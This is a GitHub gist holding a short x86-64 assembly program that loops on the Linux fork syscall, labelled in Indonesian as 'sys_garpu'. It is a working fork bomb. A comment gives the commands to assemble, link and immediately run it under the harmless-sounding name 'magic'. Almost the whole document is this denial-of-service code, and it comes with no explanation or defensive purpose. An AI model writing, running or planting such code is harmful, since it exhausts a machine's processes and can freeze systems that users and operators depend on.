Skip to content

Instantly share code, notes, and snippets.

@Cvar1984
Last active February 16, 2021 12:46
Show Gist options
  • Save Cvar1984/857f3af56d95158b455adc98ffa97827 to your computer and use it in GitHub Desktop.
Save Cvar1984/857f3af56d95158b455adc98ffa97827 to your computer and use it in GitHub Desktop.
section .text
global _start
_start:
mov rax, 57; sys_garpu :)
syscall
jmp _start
; compile: nasm -f elf64 magic.asm && ld magic.o -o magic && ./magic
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment